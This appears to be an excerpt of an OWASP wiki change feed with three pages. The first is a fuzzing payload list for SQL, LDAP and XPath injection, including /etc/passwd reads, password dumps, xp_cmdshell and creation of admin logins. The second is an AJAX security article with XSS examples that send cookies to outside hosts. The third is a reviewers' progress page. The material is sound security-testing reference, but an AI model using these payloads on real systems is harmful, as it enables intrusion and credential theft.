&amp;lt;nowiki&amp;gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1 in (select @@version)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union all select @@version--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'unusual' = 'unusual'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' = 'some'+'thing'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' = N'text'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' like 'some%'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 &amp;gt; 1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' &amp;gt; 't'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'whatever' in ('whatever')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 BETWEEN 1 and 3&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or username like char(37);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select * from users where login = char(114,111,111,116);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select &lt;br /&gt;
&amp;lt;nowiki&amp;gt;Password:*/=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;UNI/**/ON SEL/**/ECT&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'/**/OR/**/1/**/=/**/1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1/*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;amp;password=&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &amp;gt; @var select @var as var into temp end --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1 in (select var from temp)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select 1,load_file('/etc/passwd'),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1=( if((load_file(char(110,46,101,120,116))&amp;lt;&amp;gt;char(39,39)),1,0));&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Active SQL Injection (SQI) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY 'pass123'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' ; drop table temp --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addlogin 'name' , 'password'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== LDAP Injection ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*()|%26'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;admin*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;admin*)((|userPassword=*)&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*)(uid=*))(|(uid=*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XPATH Injection ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'+or+'1'='1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_AJAX_Vulnerabilities_(OWASP-AJ-001)&amp;diff=13700</id>
		<title>Testing for AJAX Vulnerabilities (OWASP-AJ-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_AJAX_Vulnerabilities_(OWASP-AJ-001)&amp;diff=13700"/>
				<updated>2006-11-26T14:13:19Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: /* Attacks and Vulnerabilities */ fixed some  typing error&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include&amp;lt;br&amp;gt;&lt;br /&gt;
* Create a larger attack surface with many more inputs to secure&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Expose internal functions of the Web application server&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Login Information and Intrusion Detection&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Attacks and Vulnerabilities == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''XMLHttpRequest Vulnerabilities'''&amp;lt;br&amp;gt; AJAX uses XMLHttpRequest(XHR) object for all the back-end work. A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.&amp;lt;p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Increased Attack Surface''' &amp;lt;br&amp;gt;&lt;br /&gt;
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SQL Injection'''&amp;lt;br&amp;gt;SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. &amp;lt;br&amp;gt; A typical SQL Injection attack could be as follows&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*'''''Example 1'''''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*'''''Example 2'''''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
The above query helps in dropping all the tables and destructs the database.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Cross Site Scripting'''&amp;lt;br&amp;gt;Cross Site Scripting is a technique by which malicious content is injected in form of HTML links,Javascripts Alerts or in form of error messages. XSS exploits can be used for triggering various other attacks like cookie theft, account hijacking, and denial of service. &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The Browser and Ajax Requests look identical, so the server is not able to classify them. Consequently it won't be able to discern who made the request in the background. A JavaScript program can request for a resource using Ajax that occurs in the background without  the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information&lt;br /&gt;
such as cookies to the request. JavaScript code can then access the response to this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site&lt;br /&gt;
Scripting (XSS) attack.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods&lt;br /&gt;
to propagate itself invisibly to the user. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*'''''Example''''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;howdy&amp;quot;)&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;document.location='http://www.example.com/pag.pl?'%20+document.cookie&amp;lt;/script&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Usage:''&lt;br /&gt;
&amp;lt;pre&amp;gt;http://example.com/login.php?variable=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;document.location='http://www.irr.com/cont.php?'+document.cookie&amp;lt;/script&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Client Side Injection Threats'''&amp;lt;br&amp;gt;&lt;br /&gt;
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;&lt;br /&gt;
var pos=document.URL.indexOf(&amp;quot;name=&amp;quot;)+5;&lt;br /&gt;
document.write(document.URL.substring(pos,document.URL.length));&lt;br /&gt;
&amp;lt;/SCRIPT&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''AJAX Bridging'''&amp;lt;br&amp;gt;&lt;br /&gt;
For security purposes, AJAX applications can only connect back to the Website from which they come. For example, JavaScript with AJAX downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection. An attacker could use this to access sites with restricted access.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Cross Site Request Forgery(XSRF)'''&amp;lt;br&amp;gt;&lt;br /&gt;
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Denial of Service'''&amp;lt;br&amp;gt;Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.&amp;lt;pre&amp;gt;&amp;lt;IMG SRC=&amp;quot;http://example.com/cgi-bin/ouch.cgi?a=b&amp;quot;&amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Browser Based Attacks'''&amp;lt;br&amp;gt;The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks.&amp;lt;br&amp;gt;&lt;br /&gt;
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a &amp;quot;ping&amp;quot; using JavaScript &amp;quot;image&amp;quot; objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives.&amp;lt;/p&amp;gt;&amp;lt;br&amp;gt;&amp;lt;p&amp;gt;Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Major Attacks  ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''MySpace Attack'''&amp;lt;br&amp;gt;The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed &amp;lt;SCRIPT&amp;gt; in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Yahoo! Mail Attack'''&amp;lt;br&amp;gt;In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.&lt;br /&gt;
&lt;br /&gt;
== Testing == &lt;br /&gt;
'''OWASP Testing Guide sections on AJAX Testing''' provides you a very good information on various aspects of AJAX Testing. &amp;lt;br&amp;gt;&lt;br /&gt;
[[AJAX_Testing_AoC | 4.9 AJAX Testing ]]&amp;lt;br&amp;gt;&lt;br /&gt;
[[AJAX_How_to_test_AoC | 4.9.2 How to Test AJAX]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Testing Tools ==&lt;br /&gt;
&lt;br /&gt;
Here are some of the '''AJAX Testing Tools''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Venkman''' &amp;lt;br&amp;gt; [http://www.mozilla.org/projects/venkman/ Venkman]is the code name for Mozilla's JavaScript Debugger. Venkman aims to provide a powerful JavaScript debugging environment for Mozilla based browsers. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''' Ghost Train'''&amp;lt;br&amp;gt;[http://wiki.script.aculo.us/scriptaculous/show/GhostTrain Scriptaculous's Ghost Train] is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Squish/Web (froglogic)'''&amp;lt;br&amp;gt;&lt;br /&gt;
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''JsUnit'''&amp;lt;br&amp;gt;[http://www.edwardh.com/jsunit/ JsUnit] is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.&lt;br /&gt;
&lt;br /&gt;
== References == &lt;br /&gt;
&lt;br /&gt;
*[http://en.wikipedia.org/wiki/AJAX AJAX]&amp;lt;br&amp;gt;&lt;br /&gt;
*[http://ajaxpatterns.org AJAX Patterns] &lt;br /&gt;
&lt;br /&gt;
;'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, &amp;quot;Ajax(in) Security&amp;quot;,SPI Labs]&amp;lt;br&amp;gt;&lt;br /&gt;
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, &amp;quot;Analysis of Web Application Worms and Viruses&amp;quot;,SPI Labs]&amp;lt;br&amp;gt;&lt;br /&gt;
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, &amp;quot;Ajax Security Dangers&amp;quot;,SPI Labs]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;'''Articles'''&amp;lt;br&amp;gt;&lt;br /&gt;
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path]&amp;lt;br&amp;gt;&lt;br /&gt;
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. &amp;quot;DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS&amp;quot;, Web Application Security Consortium]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Review_Panel&amp;diff=13697</id>
		<title>OWASP Testing Guide v2 Review Panel</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Review_Panel&amp;diff=13697"/>
				<updated>2006-11-26T13:46:09Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: Added comments on Fuzz and XSS&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Table_of_Contents Table of Contents]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Update: 24th November, 23.00 (GMT+1)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
**********************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;Reviewing planning&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
**********************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The reviewers are:&lt;br /&gt;
Mark Roxberry,&lt;br /&gt;
Alberto Revelli,&lt;br /&gt;
Daniel Cuthbert,&lt;br /&gt;
Antonio Parata,&lt;br /&gt;
Matteo G.P. Flora,&lt;br /&gt;
Matteo Meucci,&lt;br /&gt;
Eoin Keary,&lt;br /&gt;
Stefano Di Paola,&lt;br /&gt;
James Kist,&lt;br /&gt;
Vicente Aguilera,&lt;br /&gt;
Mauro Bregolin,&lt;br /&gt;
Syed Mohamed A,&lt;br /&gt;
Paul Davies&lt;br /&gt;
&lt;br /&gt;
* II phase reviewing&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;Here is the complete list of articles to be reviewed: &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
* '''Introduction --&amp;gt; reviewed by Eoin Keary'''&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
* '''The OWASP Testing Framework --&amp;gt;...'''&lt;br /&gt;
1 of 1 article to be reviewed (Daniel doing this)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
* '''4.1 Introduction and objectives --&amp;gt;.EK'''&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
* '''4.2 Information Gathering (Reviewed by EK) --&amp;gt; Keary'''&lt;br /&gt;
9 of 10 articles reviewed -&amp;gt; &amp;lt;BR&amp;gt; &lt;br /&gt;
* '''Testing Web Application Fingerprint''' -added new article &lt;br /&gt;
* '''Application Discovery''': &lt;br /&gt;
** Reviewed + updated(EK) (Maybe we should include HTTP methods for application descovery, such as HTTP HEAD command?)&amp;lt;BR&amp;gt;&lt;br /&gt;
** (Bregolin) If you are referring to things such as &amp;quot;fingerprinting&amp;quot;, it was hinted - and I personally agree on this - to create a new section on Web application fingerprinting. There's however a bit of overlap with Infrastructure configuration management testing&lt;br /&gt;
* '''Analysis of error codes''': &lt;br /&gt;
** Reviewed + updated(EK) &amp;lt;BR&amp;gt;&lt;br /&gt;
** Besides the own error, it would be necessary to speak about the voluntary provocation of errors? (Vicente). Two examples: &amp;lt;BR&amp;gt;&lt;br /&gt;
*** Example 1: Type error. (original): ?id=276 (test): ?id=X &amp;lt;BR&amp;gt;&lt;br /&gt;
*** Example 2: Type conversion error. (original): ?id=276 (test): ?id=276 and 1 in (select top 1 name from sysobjects) &amp;lt;BR&amp;gt;&lt;br /&gt;
** (Bregolin) Agree with the above. A testing methodology should be formalized, i.e. tester should verify if it is possible to cause information disclosure in error or diagnostic messages by tampering with user-alterable input using a set of techniques (such as type mismatch, overflow/underflow, excess input length, various forms of injection, ...)&lt;br /&gt;
* '''Infrastructure configuration management testing AoC''': &lt;br /&gt;
** Reviewed by EK. '''Not in typical guide structure -&amp;gt; (MM: I've changed the structure)'''&amp;lt;BR&amp;gt;&lt;br /&gt;
* '''SSL/TLS Testing AoC''': &lt;br /&gt;
** Reviewed + updated(EK). '''(Reviewed by MM: changed the structure)'''&amp;lt;BR&amp;gt;&lt;br /&gt;
* '''DB Listener Testing''': &lt;br /&gt;
** '''Incomplete'''&amp;lt;BR&amp;gt;&lt;br /&gt;
* '''Application configuration management testing''': &lt;br /&gt;
** Reviewed by EK. '''Not typical guide structure -&amp;gt; (MM: I've changed the structure)'''&lt;br /&gt;
** This is generally a &amp;quot;white box&amp;quot; section. There are no examples of testing the configuration from a remote perspective. If this was the aim of the document, thats fine. '''- Need feedback on this one!!'''&lt;br /&gt;
** ''Sample/known files and directories'': might be good to refer to http://www.owasp.org/index.php/Old_file_testing_AoC ??&lt;br /&gt;
** ''Logging'': Timestamp is also important&lt;br /&gt;
* '''File extensions handling'''&amp;lt;BR&amp;gt;&lt;br /&gt;
** contains the text: &amp;quot;''...To review and expand...''&amp;quot; - '''Is this complete??'''&lt;br /&gt;
** '''Need a second opinion on this one...(MM yes it is complete)'''&lt;br /&gt;
* '''Old file testing''': Reviewed by EK&lt;br /&gt;
&amp;lt;BR&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
* '''4.3 Business logic testing --&amp;gt; Meucci'''&lt;br /&gt;
1 of 1 article reviewed &lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
* '''4.4 Authentication Testing --&amp;gt; Roxberry (articles have been edited)'''&lt;br /&gt;
0 of 7 articles to be reviewed &lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.4 Authentication Testing (95%) : Reviewed by MR, Paul Davies to push to 100%&lt;br /&gt;
** 4.4.1 Default or guessable (dictionary) user account (80%) : Reviewed by MR &lt;br /&gt;
** 4.4.2 Brute Force (95%) : Reviewed by MR&lt;br /&gt;
** 4.4.3 Bypassing authentication schema (95%) : Reviewed by MR &lt;br /&gt;
** 4.4.4 Directory traversal/file include (100%) : Reviewed by MR &lt;br /&gt;
** 4.4.5 Vulnerable remember password and pwd reset (90%) Reviewed by MR&lt;br /&gt;
** 4.4.6 Logout and Browser Cache Management Testing (100%) Reviewed by MR&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
* '''4.5 Session Management Testing --&amp;gt; Syed Mohamed A'''&lt;br /&gt;
5 of 6 articles to be reviewed  &lt;br /&gt;
** 4.5 Session Management Testing (95%-&amp;gt;100%) (daniel reviewing)&lt;br /&gt;
** 4.5.1 Analysis of the Session Management Schema (90%-&amp;gt;100%) (daniel reviewing)&lt;br /&gt;
